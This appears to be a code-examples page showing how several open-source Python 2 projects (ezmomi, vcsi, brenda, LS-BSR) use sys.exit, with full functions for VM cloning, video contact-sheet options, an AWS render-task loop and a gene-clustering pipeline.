sys.exit

Here are the examples of the python api sys.exit taken from open source projects. By voting up you can indicate which examples are most useful and appropriate.

175 Examples 7

Example 151

Project: ezmomi Source File: ezmomi.py
Function: clone
    def clone(self):
        """
        Command Section: clone
        Clone a VM from a template
        """
        self.config['hostname'] = self.config['hostname'].lower()
        self.config['mem'] = int(self.config['mem'] * 1024)  # convert GB to MB

        print "Cloning %s to new host %s with %sMB RAM..." % (
            self.config['template'],
            self.config['hostname'],
            self.config['mem']
        )

        # initialize a list to hold our network settings
        ip_settings = list()

        # Get network settings for each IP
        for key, ip_string in enumerate(self.config['ips']):

            # convert ip from string to the 'IPAddress' type
            ip = IPAddress(ip_string)

            # determine network this IP is in
            for network in self.config['networks']:
                if ip in IPNetwork(network):
                    self.config['networks'][network]['ip'] = ip
                    ipnet = IPNetwork(network)
                    self.config['networks'][network]['subnet_mask'] = str(
                        ipnet.netmask
                    )
                    ip_settings.append(self.config['networks'][network])

            # throw an error if we couldn't find a network for this ip
            if not any(d['ip'] == ip for d in ip_settings):
                print "I don't know what network %s is in.  You can supply " \
                      "settings for this network in config.yml." % ip_string
                sys.exit(1)

        # network to place new VM in
        self.get_obj([vim.Network], ip_settings[0]['network'])
        datacenter = self.get_obj([vim.Datacenter],
                                  ip_settings[0]['datacenter']
                                  )

        # get the folder where VMs are kept for this datacenter
        destfolder = datacenter.vmFolder

        cluster = self.get_obj([vim.ClusterComputeResource],
                               ip_settings[0]['cluster']
                               )

        resource_pool_str = self.config['resource_pool']
        # resource_pool setting in config file takes priority over the
        # default 'Resources' pool
        if resource_pool_str == 'Resources' \
                and ('resource_pool' in ip_settings[key]):
            resource_pool_str = ip_settings[key]['resource_pool']

        resource_pool = self.get_resource_pool(cluster, resource_pool_str)

        host_system = self.config['host']
        if host_system != "":
            host_system = self.get_obj([vim.HostSystem],
                                       self.config['host']
                                       )

        if self.debug:
            self.print_debug(
                "Destination cluster",
                cluster
            )
            self.print_debug(
                "Resource pool",
                resource_pool
            )

        if resource_pool is None:
            # use default resource pool of target cluster
            resource_pool = cluster.resourcePool

        datastore = None
        if 'datastore' in ip_settings[0]:
            datastore = self.get_obj(
                [vim.Datastore],
                ip_settings[0]['datastore'])
            if datastore is None:
                print "Error: Unable to find Datastore '%s'" \
                      % ip_settings[0]['datastore']
                sys.exit(1)

        template_vm = self.get_vm_failfast(
            self.config['template'],
            False,
            'Template VM'
        )

        # Relocation spec
        relospec = vim.vm.RelocateSpec()
        relospec.datastore = datastore
        if host_system:
            relospec.host = host_system

        if resource_pool:
            relospec.pool = resource_pool

        # Networking self.config for VM and guest OS
        devices = []
        adaptermaps = []

        # add existing NIC devices from template to our list of NICs
        # to be created
        try:
            for device in template_vm.config.hardware.device:

                if hasattr(device, 'addressType'):
                    # this is a VirtualEthernetCard, so we'll delete it
                    nic = vim.vm.device.VirtualDeviceSpec()
                    nic.operation = \
                        vim.vm.device.VirtualDeviceSpec.Operation.remove
                    nic.device = device
                    devices.append(nic)
        except:
            # not the most graceful handling, but unable to reproduce
            # user's issues in #57 at this time.
            pass

        # create a Network device for each static IP
        for key, ip in enumerate(ip_settings):
            # VM device
            nic = vim.vm.device.VirtualDeviceSpec()
            # or edit if a device exists
            nic.operation = vim.vm.device.VirtualDeviceSpec.Operation.add
            nic.device = vim.vm.device.VirtualVmxnet3()
            nic.device.wakeOnLanEnabled = True
            nic.device.addressType = 'assigned'
            # 4000 seems to be the value to use for a vmxnet3 device
            nic.device.key = 4000
            nic.device.deviceInfo = vim.Description()
            nic.device.deviceInfo.label = 'Network Adapter %s' % (key + 1)
            nic.device.deviceInfo.summary = ip_settings[key]['network']
            nic.device.backing = (
                vim.vm.device.VirtualEthernetCard.NetworkBackingInfo()
            )
            nic.device.backing.network = (
                self.get_obj([vim.Network], ip_settings[key]['network'])
            )
            nic.device.backing.deviceName = ip_settings[key]['network']
            nic.device.backing.useAutoDetect = False
            nic.device.connectable = vim.vm.device.VirtualDevice.ConnectInfo()
            nic.device.connectable.startConnected = True
            nic.device.connectable.allowGuestControl = True
            devices.append(nic)

            # guest NIC settings, i.e. 'adapter map'
            guest_map = vim.vm.customization.AdapterMapping()
            guest_map.adapter = vim.vm.customization.IPSettings()
            guest_map.adapter.ip = vim.vm.customization.FixedIp()
            guest_map.adapter.ip.ipAddress = str(ip_settings[key]['ip'])
            guest_map.adapter.subnetMask = str(ip_settings[key]['subnet_mask'])

            # these may not be set for certain IPs
            try:
                guest_map.adapter.gateway = ip_settings[key]['gateway']
            except:
                pass

            try:
                guest_map.adapter.dnsDomain = self.config['domain']
            except:
                pass

            adaptermaps.append(guest_map)

        # VM config spec
        vmconf = vim.vm.ConfigSpec()
        vmconf.numCPUs = self.config['cpus']
        vmconf.memoryMB = self.config['mem']
        vmconf.cpuHotAddEnabled = True
        vmconf.memoryHotAddEnabled = True
        vmconf.deviceChange = devices

        # DNS settings
        globalip = vim.vm.customization.GlobalIPSettings()
        globalip.dnsServerList = self.config['dns_servers']
        globalip.dnsSuffixList = self.config['domain']

        # Hostname settings
        ident = vim.vm.customization.LinuxPrep()
        ident.domain = self.config['domain']
        ident.hostName = vim.vm.customization.FixedName()
        ident.hostName.name = self.config['hostname']

        customspec = vim.vm.customization.Specification()
        customspec.nicSettingMap = adaptermaps
        customspec.globalIPSettings = globalip
        customspec.identity = ident

        # Clone spec
        clonespec = vim.vm.CloneSpec()
        clonespec.location = relospec
        clonespec.config = vmconf
        clonespec.customization = customspec
        clonespec.powerOn = True
        clonespec.template = False

        self.addDisks(template_vm, clonespec)

        if self.debug:
            self.print_debug("CloneSpec", clonespec)

        # fire the clone task
        tasks = [template_vm.Clone(folder=destfolder,
                                   name=self.config['hostname'],
                                   spec=clonespec
                                   )]
        result = self.WaitForTasks(tasks)

        if self.config['post_clone_cmd']:
            try:
                # helper env variables
                os.environ['EZMOMI_CLONE_HOSTNAME'] = self.config['hostname']
                print "Running --post-clone-cmd %s" % \
                      self.config['post_clone_cmd']
                os.system(self.config['post_clone_cmd'])

            except Exception as e:
                print "Error running post-clone command. Exception: %s" % e
                pass

        # send notification email
        if self.config['mail']:
            self.send_email()

Example 152

Project: vcsi Source File: vcsi.py
Function: main
def main():
    """Program entry point
    """
    parser = argparse.ArgumentParser(description="Create a video contact sheet")
    parser.add_argument("filenames", nargs="+")
    parser.add_argument(
        "-o", "--output",
        help="save to output file",
        dest="output_path")
    parser.add_argument(
        "--start-delay-percent",
        help="do not capture frames in the first n percent of total time",
        dest="start_delay_percent",
        type=int,
        default=DEFAULT_START_DELAY_PERCENT)
    parser.add_argument(
        "--end-delay-percent",
        help="do not capture frames in the last n percent of total time",
        dest="end_delay_percent",
        type=int,
        default=DEFAULT_END_DELAY_PERCENT)
    parser.add_argument(
        "--delay-percent",
        help="do not capture frames in the first and last n percent of total time",
        dest="delay_percent",
        type=int,
        default=DEFAULT_DELAY_PERCENT)
    parser.add_argument(
        "--grid-spacing",
        help="number of pixels spacing captures both vertically and horizontally",
        dest="grid_spacing",
        type=int,
        default=DEFAULT_GRID_SPACING)
    parser.add_argument(
        "--grid-horizontal-spacing",
        help="number of pixels spacing captures horizontally",
        dest="grid_horizontal_spacing",
        type=int,
        default=DEFAULT_GRID_HORIZONTAL_SPACING)
    parser.add_argument(
        "--grid-vertical-spacing",
        help="number of pixels spacing captures vertically",
        dest="grid_vertical_spacing",
        type=int,
        default=DEFAULT_GRID_VERTICAL_SPACING)
    parser.add_argument(
        "-w", "--width",
        help="width of the generated contact sheet",
        dest="vcs_width",
        type=int,
        default=DEFAULT_CONTACT_SHEET_WIDTH)
    parser.add_argument(
        "-g", "--grid",
        help="display frames on a mxn grid (for example 4x5)",
        dest="grid",
        type=mxn_type,
        default=DEFAULT_GRID_SIZE)
    parser.add_argument(
        "-s", "--num-samples",
        help="number of samples",
        dest="num_samples",
        type=int,
        default=None)
    parser.add_argument(
        "-t", "--show-timestamp",
        action="store_true",
        help="display timestamp for each frame",
        dest="show_timestamp")
    parser.add_argument(
        "--metadata-font-size",
        help="size of the font used for metadata",
        dest="metadata_font_size",
        type=int,
        default=DEFAULT_METADATA_FONT_SIZE)
    parser.add_argument(
        "--metadata-font",
        help="TTF font used for metadata",
        dest="metadata_font",
        default=DEFAULT_METADATA_FONT)
    parser.add_argument(
        "--timestamp-font-size",
        help="size of the font used for timestamps",
        dest="timestamp_font_size",
        type=int,
        default=DEFAULT_TIMESTAMP_FONT_SIZE)
    parser.add_argument(
        "--timestamp-font",
        help="TTF font used for timestamps",
        dest="timestamp_font",
        default=DEFAULT_TIMESTAMP_FONT)
    parser.add_argument(
        "--metadata-position",
        help="Position of the metadata header. Must be one of ['top', 'bottom', 'hidden']",
        dest="metadata_position",
        type=metadata_position_type,
        default=DEFAULT_METADATA_POSITION)
    parser.add_argument(
        "--background-color",
        help="Color of the background in hexadecimal, for example AABBCC",
        dest="background_color",
        type=hex_color_type,
        default=hex_color_type(DEFAULT_BACKGROUND_COLOR))
    parser.add_argument(
        "--metadata-font-color",
        help="Color of the metadata font in hexadecimal, for example AABBCC",
        dest="metadata_font_color",
        type=hex_color_type,
        default=hex_color_type(DEFAULT_METADATA_FONT_COLOR))
    parser.add_argument(
        "--timestamp-font-color",
        help="Color of the timestamp font in hexadecimal, for example AABBCC",
        dest="timestamp_font_color",
        type=hex_color_type,
        default=hex_color_type(DEFAULT_TIMESTAMP_FONT_COLOR))
    parser.add_argument(
        "--timestamp-background-color",
        help="Color of the timestamp background rectangle in hexadecimal, for example AABBCC",
        dest="timestamp_background_color",
        type=hex_color_type,
        default=hex_color_type(DEFAULT_TIMESTAMP_BACKGROUND_COLOR))
    parser.add_argument(
        "--template",
        help="Path to metadata template file",
        dest="metadata_template_path",
        default=None)
    parser.add_argument(
        "-m", "--manual",
        help="Comma-seperated list of frame timestamps to use, for example 1:11:11.111,2:22:22.222",
        dest="manual_timestamps",
        type=manual_timestamps,
        default=None)
    parser.add_argument(
        "-v", "--verbose",
        action="store_true",
        help="display verbose messages",
        dest="is_verbose")
    parser.add_argument(
        "-a", "--accurate",
        action="store_true",
        help="""Make accurate captures. This capture mode is way slower than the default one
        but it helps when capturing frames from HEVC videos.""",
        dest="is_accurate")
    parser.add_argument(
        "-A", "--accurate-delay-seconds",
        type=int,
        default=DEFAULT_ACCURATE_DELAY_SECONDS,
        help="""Fast skip to N seconds before capture time, then do accurate capture
        (decodes N seconds of video before each capture). This is used with accurate capture mode only.""",
        dest="accurate_delay_seconds")
    parser.add_argument(
        "--metadata-margin",
        type=int,
        default=DEFAULT_METADATA_MARGIN,
        help="Margin (in pixels) in the metadata header.",
        dest="metadata_margin")
    parser.add_argument(
        "--metadata-horizontal-margin",
        type=int,
        default=DEFAULT_METADATA_HORIZONTAL_MARGIN,
        help="Horizontal margin (in pixels) in the metadata header.",
        dest="metadata_horizontal_margin")
    parser.add_argument(
        "--metadata-vertical-margin",
        type=int,
        default=DEFAULT_METADATA_VERTICAL_MARGIN,
        help="Vertical margin (in pixels) in the metadata header.",
        dest="metadata_vertical_margin")
    parser.add_argument(
        "--timestamp-horizontal-padding",
        type=int,
        default=DEFAULT_TIMESTAMP_HORIZONTAL_PADDING,
        help="Horizontal padding (in pixels) for timestamps.",
        dest="timestamp_horizontal_padding")
    parser.add_argument(
        "--timestamp-vertical-padding",
        type=int,
        default=DEFAULT_TIMESTAMP_VERTICAL_PADDING,
        help="Vertical padding (in pixels) for timestamps.",
        dest="timestamp_vertical_padding")
    parser.add_argument(
        "--timestamp-horizontal-margin",
        type=int,
        default=DEFAULT_TIMESTAMP_HORIZONTAL_MARGIN,
        help="Horizontal margin (in pixels) for timestamps.",
        dest="timestamp_horizontal_margin")
    parser.add_argument(
        "--timestamp-vertical-margin",
        type=int,
        default=DEFAULT_TIMESTAMP_VERTICAL_MARGIN,
        help="Vertical margin (in pixels) for timestamps.",
        dest="timestamp_vertical_margin")
    parser.add_argument(
        "--quality",
        type=int,
        default=DEFAULT_IMAGE_QUALITY,
        help="Output image quality. Must be an integer in the range 0-100. 100 = best quality.",
        dest="image_quality")
    parser.add_argument(
        "-f", "--format",
        type=str,
        default=DEFAULT_IMAGE_FORMAT,
        help="Output image format. Can be any format supported by pillow. For example 'png' or 'jpg'.",
        dest="image_format")
    parser.add_argument(
        "-T", "--timestamp-position",
        type=timestamp_position_type,
        default=DEFAULT_TIMESTAMP_POSITION,
        help="Timestamp position. Must be one of %s." % (VALID_TIMESTAMP_POSITIONS,),
        dest="timestamp_position")
    parser.add_argument(
        "-r", "--recursive",
        action="store_true",
        help="Process every file in the specified directory recursively.",
        dest="recursive")
    parser.add_argument(
        "--capture-alpha",
        type=int,
        default=DEFAULT_CAPTURE_ALPHA,
        help="Alpha channel value for the captures (transparency in range [0, 255]). Defaults to 255 (opaque)",
        dest="capture_alpha")
    parser.add_argument(
        "--version",
        action="version",
        version="%(prog)s version {version}".format(version=__version__))
    parser.add_argument(
        "--list-template-attributes",
        action="store_true",
        dest="list_template_attributes")

    args = parser.parse_args()

    if args.list_template_attributes:
        print_template_attributes()
        sys.exit(0)

    if args.recursive:
        for path in args.filenames:
            for root, subdirs, files in os.walk(path):
                for f in files:
                    filepath = os.path.join(root, f)
                    process_file(filepath, args)
    else:
        for path in args.filenames:
            if os.path.isdir(path):
                for filepath in os.listdir(path):
                    abs_filepath = os.path.join(path, filepath)
                    if not os.path.isdir(abs_filepath):
                        process_file(abs_filepath, args)
            else:
                process_file(path, args)

Example 153

Project: brenda Source File: node.py
def run_tasks(opts, args, conf):
    def write_done_file():
        with open("DONE", "w") as f:
            f.write(aws.get_done(opts, conf)+'\n')

    def read_done_file():
        try:
            with open('DONE') as f:
                ret = f.readline().strip()
        except:
            ret = 'exit'
        aws.validate_done(ret)
        return ret

    def task_complete_accounting(task_count):
        # update some info files if we are running in daemon mode
        # number of tasks we have completed so far
        utils.write_atomic('task_count', "%d\n" % (task_count,))

        # timestamp of completion of last task
        utils.write_atomic('task_last', "%d\n" % (time.time(),))

    def signal_handler(signal, frame):
        print "cuem*** SIGNAL %r, exiting" % (signal,)
        cleanup_all()
        sys.exit(1)

    def cleanup_all():
        tasks = (local.task_active, local.task_push)
        local.task_active = local.task_push = None
        for i, task in enumerate(tasks):
            name = task_names[i]
            cleanup(task, name)

    def cleanup(task, name):
        if task:
            if task.msg is not None:
                try:
                    msg = task.msg
                    task.msg = None
                    msg.change_visibility(0) # immediately return task back to work queue
                except Exception, e:
                    print "******* CLEANUP EXCEPTION sqs change_visibility", name, e
            if task.proc is not None:
                try:
                    proc = task.proc
                    task.proc = None
                    proc.stop()
                except Exception, e:
                    print "******* CLEANUP EXCEPTION proc stop", name, e
            if task.outdir is not None:
                try:
                    outdir = task.outdir
                    task.outdir = None
                    utils.rmtree(outdir)
                except Exception, e:
                    print "******* CLEANUP EXCEPTION rm outdir", name, task.outdir, e

    def task_loop():
        try:
            # reset tasks
            local.task_active = None
            local.task_push = None

            # get SQS work queue
            q = aws.get_sqs_queue(conf)

            # Loop over tasks.  There are up to two different tasks at any
            # given moment that we are processing concurrently:
            #
            # 1. Active task -- usually a blender render operation.
            # 2. S3 push task -- a task which pushes the products of the
            #                    previous active task (such as rendered
            #                    frames) to S3.
            while True:
                # reset active task
                local.task_active = None

                # initialize active task object
                task = State()
                task.msg = None
                task.proc = None
                task.retcode = None
                task.outdir = None
                task.id = 0

                # Get a task from the SQS work queue.  This is normally
                # a short script that runs blender to render one
                # or more frames.
                task.msg = q.read()

                # output some debug info
                print "queue read:", task.msg
                if local.task_push:
                    print "push task:", local.task_push.__dict__
                else:
                    print "no task push task"

                # process task
                if task.msg is not None:
                    # assign an ID to task
                    local.task_id_counter += 1
                    task.id = local.task_id_counter

                    # register active task
                    local.task_active = task

                    # create output directory
                    task.outdir = os.path.join(work_dir, "brenda-outdir%d.tmp" % (task.id,))
                    utils.rmtree(task.outdir)
                    utils.mkdir(task.outdir)

                    # get the task script
                    script = task.msg.get_body()
                    print "script len:", len(script)

                    # do macro substitution on the task script
                    script = script.replace('$OUTDIR', task.outdir)

                    # add shebang if absent
                    if not script.startswith("#!"):
                        script = "#!/bin/bash\n" + script

                    # cd to project directory, where we will run blender from
                    with utils.Cd(proj_dir) as cd:
                        # write script file and make it executable
                        script_fn = "./brenda-go"
                        with open(script_fn, 'w') as f:
                            f.write(script)
                        st = os.stat(script_fn)
                        os.chmod(script_fn, st.st_mode | (stat.S_IEXEC|stat.S_IXGRP|stat.S_IXOTH))

                        # run the script
                        print "------- Run script %s -------" % (os.path.realpath(script_fn),)
                        print script,
                        print "--------------------------"
                        task.proc = Subprocess([script_fn])

                    print "active task:", local.task_active.__dict__

                # Wait for active and S3-push tasks to complete,
                # while periodically reasserting with SQS to
                # acknowledge that tasks are still pending.
                # (If we don't reassert with SQS frequently enough,
                # it will assume we died, and put our tasks back
                # in the queue.  "frequently enough" means within
                # visibility_timeout.)
                count = 0
                while True:
                    reassert = (count >= visibility_timeout_reassert)
                    for i, task in enumerate((local.task_active, local.task_push)):
                        if task:
                            name = task_names[i]
                            if task.proc is not None:
                                # test if process has finished
                                task.retcode = task.proc.poll()
                                if task.retcode is not None:
                                    # process has finished
                                    task.proc = None

                                    # did process finish with errors?
                                    if task.retcode != 0:
                                        errtxt = "fatal error in %s task" % (name,)
                                        if name == 'active':
                                            raise error.ValueErrorRetry(errtxt)
                                        else:
                                            raise ValueError(errtxt)

                                    # Process finished successfully.  If S3-push process,
                                    # tell SQS that the task completed successfully.
                                    if name == 'push':
                                        print "******* TASK", task.id, "COMMITTED to S3"
                                        q.delete_message(task.msg)
                                        task.msg = None
                                        local.task_count += 1
                                        task_complete_accounting(local.task_count)

                                    # active task completed?
                                    if name == 'active':
                                        print "******* TASK", task.id, "READY-FOR-PUSH"

                            # tell SQS that we are still working on the task
                            if reassert and task.proc is not None:
                                print "******* REASSERT", name, task.id
                                task.msg.change_visibility(visibility_timeout)

                    # break out of loop only when no pending tasks remain
                    if ((not local.task_active or local.task_active.proc is None)
                        and (not local.task_push or local.task_push.proc is None)):
                        break

                    # setup for next process poll iteration
                    if reassert:
                        count = 0
                    time.sleep(1)
                    count += 1

                # clean up the S3-push task
                cleanup(local.task_push, 'push')
                local.task_push = None

                # start a concurrent push task to commit files generated by
                # just-completed active task (such as blender render frames) to S3
                if local.task_active:
                    local.task_active.proc = start_s3_push_process(opts, args, conf, local.task_active.outdir)
                    local.task_push = local.task_active
                    local.task_active = None

                # if no active task and no S3-push task, we are done (unless DONE is set to "poll")
                if not local.task_active and not local.task_push:
                    if read_done_file() == "poll":
                        print "Polling for more work..."
                        time.sleep(15)
                    else:
                        break

        finally:
            cleanup_all()

    # initialize task_active and task_push states
    task_names = ('active', 'push')
    local = State()
    local.task_active = None
    local.task_push = None
    local.task_id_counter = 0
    local.task_count = 0

    # setup signal handler
    signal.signal(signal.SIGINT, signal_handler)
    signal.signal(signal.SIGTERM, signal_handler)

    # get configuration parameters
    work_dir = aws.get_work_dir(conf)
    visibility_timeout_reassert = int(conf.get('VISIBILITY_TIMEOUT_REASSERT', '30'))
    visibility_timeout = int(conf.get('VISIBILITY_TIMEOUT', '120'))

    # validate RENDER_OUTPUT bucket
    aws.get_s3_output_bucket(conf)

    # file cleanup
    utils.rm('task_count')
    utils.rm('task_last')

    # create Blender temporary directory
    tmp_dir = os.path.join(work_dir, 'tmp')
    if not os.path.isdir(tmp_dir):
        utils.mkdir(tmp_dir)
    os.environ['TMP'] = tmp_dir

    # save the value of DONE config var
    write_done_file()

    # Get our spot instance request, if it exists
    spot_request_id = None
    if int(conf.get('RUNNING_ON_EC2', '1')):
        try:
            instance_id = aws.get_instance_id_self()
            spot_request_id = aws.get_spot_request_from_instance_id(conf, instance_id)
            print "Spot request ID:", spot_request_id
        except Exception, e:
            print "Error determining spot instance request:", e

    # get project (from s3:// or file://)
    blender_project = conf.get('BLENDER_PROJECT')
    if not blender_project:
        raise ValueError("BLENDER_PROJECT not defined in configuration")

    # directory that blender will be run from
    proj_dir = get_project(conf, blender_project)
    print "PROJ_DIR", proj_dir

    # mount additional EBS volumes
    aws.mount_additional_ebs(conf, proj_dir)

    # continue only if we are not in "dry-run" mode
    if not opts.dry_run:
        # execute the task loop
        error.retry(conf, task_loop)

        # if "DONE" file == "shutdown", do a shutdown now as we exit
        if read_done_file() == "shutdown":
            if spot_request_id:
                try:
                    # persistent spot instances must be explicitly cancelled, or
                    # EC2 will automatically requeue the spot instance request
                    print "Canceling spot instance request:", spot_request_id
                    aws.cancel_spot_request(conf, spot_request_id)
                except Exception, e:
                    print "Error canceling spot instance request:", e
            utils.shutdown()

        print "******* DONE (%d tasks completed)" % (local.task_count,)

Example 154

Project: LS-BSR Source File: ls_bsr.py
def main(directory,id,filter,processors,genes,cluster_method,blast,length,
         max_plog,min_hlog,f_plog,keep,filter_peps,filter_scaffolds,prefix,temp_dir,debug):
    start_dir = os.getcwd()
    ap=os.path.abspath("%s" % start_dir)
    dir_path=os.path.abspath("%s" % directory)
    logging.logPrint("Testing paths of dependencies")
    if blast=="blastn" or blast=="tblastn":
        ab = subprocess.call(['which', 'blastn'])
        if ab == 0:
            print "citation: Altschul SF, Madden TL, Schaffer AA, Zhang J, Zhang Z, Miller W, and Lipman DJ. 1997. Gapped BLAST and PSI-BLAST: a new generation of protein database search programs. Nucleic Acids Res 25:3389-3402"
        else:
            print "blastn isn't in your path, but needs to be!"
            sys.exit()
    if "NULL" in temp_dir:
        fastadir = tempfile.mkdtemp()
    else:
        fastadir = os.path.abspath("%s" % temp_dir)
        if os.path.exists('%s' % temp_dir):
            print "old run directory exists in your genomes directory (%s).  Delete and run again" % temp_dir
            sys.exit()
        else:
            os.makedirs('%s' % temp_dir)
    for infile in glob.glob(os.path.join(dir_path, '*.fasta')):
        name=get_seq_name(infile)
        os.link("%s" % infile, "%s/%s.new" % (fastadir,name))
    if "null" in genes:
        rc = subprocess.call(['which', 'prodigal'])
        if rc == 0:
            pass
        else:
            print "prodigal is not in your path, but needs to be!"
            sys.exit()
        print "citation: Hyatt D, Chen GL, Locascio PF, Land ML, Larimer FW, and Hauser LJ. 2010. Prodigal: prokaryotic gene recognition and translation initiation site identification. BMC Bioinformatics 11:119"
        if "usearch" in cluster_method:
            print "citation: Edgar RC. 2010. Search and clustering orders of magnitude faster than BLAST. Bioinformatics 26:2460-2461"
        elif "cd-hit" in cluster_method:
            print "citation: Li, W., Godzik, A. 2006. Cd-hit: a fast program for clustering and comparing large sets of protein or nuceltodie sequences. Bioinformatics 22(13):1658-1659"
        elif "vsearch" in cluster_method:
            print "citation: Rognes, T., Flouri, T., Nichols, B., Qunice, C., Mahe, Frederic. 2016. VSEARCH: a versatile open source tool for metagenomics. PeerJ Preprints. DOI: https://doi.org/10.7287/peerj.preprints.2409v1"
        if blast=="blat":
            ac = subprocess.call(['which', 'blat'])
            if ac == 0:
                print "citation: W.James Kent. 2002. BLAT - The BLAST-Like Alignment Tool.  Genome Research 12:656-664"
            else:
                print "You have requested blat, but it is not in your PATH"
                sys.exit()
        logging.logPrint("predicting genes with Prodigal")
        predict_genes(fastadir, processors)
        logging.logPrint("Prodigal done")
        """This function produces locus tags"""
        genbank_hits = process_genbank_files(dir_path)
        if genbank_hits == None or len(genbank_hits) == 0:
            os.system("cat *genes.seqs > all_gene_seqs.out")
            if filter_scaffolds == "T":
                filter_scaffolds("all_gene_seqs.out")
                os.system("mv tmp.out all_gene_seqs.out")
            else:
                pass
        else:
            logging.logPrint("Converting genbank files")
            """First combine all of the prodigal files into one file"""
            os.system("cat *genes.seqs > all_gene_seqs.out")
            if filter_scaffolds == "T":
                filter_scaffolds("all_gene_seqs.out")
                os.system("mv tmp.out all_gene_seqs.out")
            else:
                pass
            """This combines the locus tags with the Prodigal prediction"""
            os.system("cat *locus_tags.fasta all_gene_seqs.out > tmp.out")
            os.system("mv tmp.out all_gene_seqs.out")
            """I also need to convert the GenBank file to a FASTA file"""
            for hit in genbank_hits:
                reduced_hit = hit.replace(".gbk","")
                SeqIO.convert("%s/%s" % (dir_path, hit), "genbank", "%s.fasta.new" % reduced_hit, "fasta")
        if "NULL" in cluster_method:
            print "Clustering chosen, but no method selected...exiting"
            sys.exit()
        elif "usearch" in cluster_method:
            ac = subprocess.call(['which', 'usearch'])
            if ac == 0:
                os.system("mkdir split_files")
                os.system("cp all_gene_seqs.out split_files/all_sorted.txt")
                os.chdir("split_files/")
                logging.logPrint("Splitting FASTA file for use with USEARCH")
                split_files("all_sorted.txt")
                logging.logPrint("clustering with USEARCH at an ID of %s" % id)
                run_usearch(id)
                os.system("cat *.usearch.out > all_sorted.txt")
                os.system("mv all_sorted.txt %s" % fastadir)
                os.chdir("%s" % fastadir)
                uclust_cluster(id)
                logging.logPrint("USEARCH clustering finished")
            else:
                print "usearch must be in your path as usearch...exiting"
                sys.exit()
        elif "vsearch" in cluster_method:
            ac = subprocess.call(['which', 'vsearch'])
            if ac == 0:
                logging.logPrint("clustering with VSEARCH at an ID of %s, using %s processors" % (id,processors))
                run_vsearch(id, processors)
                os.system("mv vsearch.out consensus.fasta")
                logging.logPrint("VSEARCH clustering finished")
            else:
                print "vsearch must be in your path as vsearch...exiting"
                sys.exit()
        elif "cd-hit" in cluster_method:
            ac = subprocess.call(['which', 'cd-hit-est'])
            if ac == 0:
                logging.logPrint("clustering with cd-hit at an ID of %s, using %s processors" % (id,processors))
                subprocess.check_call("cd-hit-est -i all_gene_seqs.out -o consensus.fasta -M 0 -T %s -c %s > /dev/null 2>&1" % (processors, id), shell=True)
            else:
                print "cd-hit must be in your path as cd-hit-est...exiting"
                sys.exit()
        """need to check for dups here"""
        dup_ids = test_duplicate_header_ids("consensus.fasta")
        if dup_ids == "True":
            pass
        elif dup_ids == "False":
            print "duplicate headers identified, renaming.."
            rename_fasta_header("consensus.fasta", "tmp.txt")
            os.system("mv tmp.txt consensus.fasta")
        else:
            pass
        if "tblastn" == blast:
            subprocess.check_call("makeblastdb -in consensus.fasta -dbtype nucl > /dev/null 2>&1", shell=True)
            translate_consensus("consensus.fasta")
            if filter_peps == "T":
                filter_seqs("tmp.pep")
                os.system("rm tmp.pep")
            else:
                os.system("mv tmp.pep consensus.pep")
            clusters = get_cluster_ids("consensus.pep")
            blast_against_self_tblastn("tblastn", "consensus.fasta", "consensus.pep", "tmp_blast.out", processors, filter)
        elif "blastn" == blast:
            subprocess.check_call("makeblastdb -in consensus.fasta -dbtype nucl > /dev/null 2>&1", shell=True)
            blast_against_self_blastn("blastn", "consensus.fasta", "consensus.fasta", "tmp_blast.out", filter, processors)
            clusters = get_cluster_ids("consensus.fasta")
        elif "blat" == blast:
            blat_against_self("consensus.fasta", "consensus.fasta", "tmp_blast.out", processors)
            clusters = get_cluster_ids("consensus.fasta")
        else:
            pass
        subprocess.check_call("sort -u -k 1,1 tmp_blast.out > self_blast.out", shell=True)
        ref_scores=parse_self_blast(open("self_blast.out", "U"))
        subprocess.check_call("rm tmp_blast.out self_blast.out", shell=True)
        os.system("rm *new_genes.*")
        if blast == "tblastn" or blast == "blastn":
            logging.logPrint("starting BLAST")
        else:
            logging.logPrint("starting BLAT")
        if "tblastn" == blast:
            blast_against_each_genome_tblastn(dir_path, processors, "consensus.pep", filter)
        elif "blastn" == blast:
            blast_against_each_genome_blastn(dir_path, processors, filter, "consensus.fasta")
        elif "blat" == blast:
            blat_against_each_genome(dir_path, "consensus.fasta",processors)
        else:
            pass
    else:
        logging.logPrint("Using pre-compiled set of predicted genes")
        files = glob.glob(os.path.join(dir_path, "*.fasta"))
        if len(files)==0:
            print "no usable reference genomes found!"
            sys.exit()
        else:
            pass
        gene_path=os.path.abspath("%s" % genes)
        dup_ids = test_duplicate_header_ids(gene_path)
        if dup_ids == "True":
            pass
        elif dup_ids == "False":
            print "duplicate headers identified, exiting.."
            sys.exit()
        clusters = get_cluster_ids(gene_path)
        os.system("cp %s %s" % (gene_path,fastadir))
        os.chdir("%s" % fastadir)
        if gene_path.endswith(".pep"):
            logging.logPrint("using tblastn on peptides")
            try:
                subprocess.check_call("makeblastdb -in %s -dbtype prot > /dev/null 2>&1" % gene_path, shell=True)
            except:
                logging.logPrint("problem encountered with BLAST database")
                sys.exit()
            blast_against_self_tblastn("blastp", gene_path, gene_path, "tmp_blast.out", processors, filter)
            subprocess.check_call("sort -u -k 1,1 tmp_blast.out > self_blast.out", shell=True)
            ref_scores=parse_self_blast(open("self_blast.out", "U"))
            subprocess.check_call("rm tmp_blast.out self_blast.out", shell=True)
            logging.logPrint("starting BLAST")
            blast_against_each_genome_tblastn(dir_path, processors, gene_path, filter)
        elif gene_path.endswith(".fasta"):
            if "tblastn" == blast:
                logging.logPrint("using tblastn")
                translate_genes(gene_path)
                try:
                    subprocess.check_call("makeblastdb -in %s -dbtype nucl > /dev/null 2>&1" % gene_path, shell=True)
                except:
                    logging.logPrint("problem encountered with BLAST database")
                    sys.exit()
                blast_against_self_tblastn("tblastn", gene_path, "genes.pep", "tmp_blast.out", processors, filter)
                subprocess.check_call("sort -u -k 1,1 tmp_blast.out > self_blast.out", shell=True)
                ref_scores=parse_self_blast(open("self_blast.out", "U"))
                subprocess.check_call("rm tmp_blast.out self_blast.out", shell=True)
                logging.logPrint("starting BLAST")
                blast_against_each_genome_tblastn(dir_path, processors, "genes.pep", filter)
                os.system("cp genes.pep %s" % start_dir)
            elif "blastn" == blast:
                logging.logPrint("using blastn")
                try:
                    subprocess.check_call("makeblastdb -in %s -dbtype nucl > /dev/null 2>&1" % gene_path, shell=True)
                except:
                    logging.logPrint("Database not formatted correctly...exiting")
                    sys.exit()
                try:
                    blast_against_self_blastn("blastn", gene_path, gene_path, "tmp_blast.out", filter, processors)
                except:
                    print "problem with blastn, exiting"
                    sys.exit()
